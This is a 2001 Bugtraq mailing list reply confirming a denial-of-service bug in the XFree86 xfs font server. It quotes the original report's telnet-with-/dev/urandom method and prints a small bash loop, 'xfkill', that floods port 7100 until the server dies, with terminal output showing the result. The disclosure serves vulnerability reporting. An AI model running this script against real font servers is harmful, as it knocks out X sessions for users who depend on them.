Bugtraq mailing list archives
Re:XFree86-xfs-4.0.1-1 DoS
From: "Mathias Dybvik" <tmdybvik () hotmail com>
Date: Sun, 10 Jun 2001 03:16:42 -0400
Confirmed, on Mandrake 8.0.I should, however, point out that I was only able to take down the font-server as a local user, and not from a remote host. This could be a bandwidth problem, caused by the fact that I only have a measly 10Mb/s LAN. Then again, my urandom bandwidth is less than half of that, so I'm not sure what gives...
The moral of the story is that (at least) any local user can kill the xfs process. This has dire consequences for any user either using X on that box, or using an x-terminal relying on that fontserver.
[user@userland ~]$ ps -ax|grep xfs 9363 ? S 0:00 xfs -port 7100 -daemon -user xfs 9574 pts/1 S 0:00 grep xfs [user@userland ~]$./xfkill [user@userland ~]$ ps -ax|grep xfs 9626 pts/1 S 0:00 grep xfs $cat xfkill [user@userland ~]$ cat xfkill #!/bin/bash XFSPORT=7100 XFS_IP=192.168.1.254 for ((COUNT=0;COUNT<500;COUNT=$COUNT+1)) do echo sending garbage to $XFSPORT pass $COUNT telnet $XFS_IP $XFSPORT </dev/urandom &>/dev/null done Version information: $ rpm -qi XFree86-xfs Name : XFree86-xfs Relocations: (not relocateable) Version : 4.0.3 Vendor: MandrakeSoft Release : 7mdk Build Date: Sun 08 Apr 2001 08 Install date: Mon 23 Apr 2001 09:32:49 PM UTC Build Host: bi.mandrake Group : System/Servers Source RPM: XFree86-4.0.3-7mdk Size : 536213 License: MIT Summary : Font server for XFree86
Original Message <<<<<<<<<<<<<<<<<<
On 6/6/01, 2:31:49 PM, =?iso-8859-2?q?Jaros=B3aw=20Zachwieja?= <grok () mhd pl> wrote regarding XFree86-xfs-4.0.1-1 DoS:
Hello,
xfs from the package XFree86-xfs-4.0.1-1 (i386.rpm), RedHat 7.0 seems to suffer from a Denial of Service attack. To cause xfs to stop responding for requests, try to do the fillowing:
$ telnet victim xfs </dev/urandom
Repeat about 100 (or 1000) times and you get Connection refused message.
Regular Xservers can no longer connect, usually crash stating Could not opendefault font 'fixed' and probably get disabled for 5 minutes if run from inittab.
I'd appreciate any succesfull/unsuccesfull attemps of reproducing this behaviour.
Regards, -- Valentine M. Smith
_________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
Current thread:
- XFree86-xfs-4.0.1-1 DoS Jarosław Zachwieja (Jun 08)
- <Possible follow-ups>
- Re:XFree86-xfs-4.0.1-1 DoS Mathias Dybvik (Jun 10)
- Re:XFree86-xfs-4.0.1-1 DoS Mathias Dybvik (Jun 11)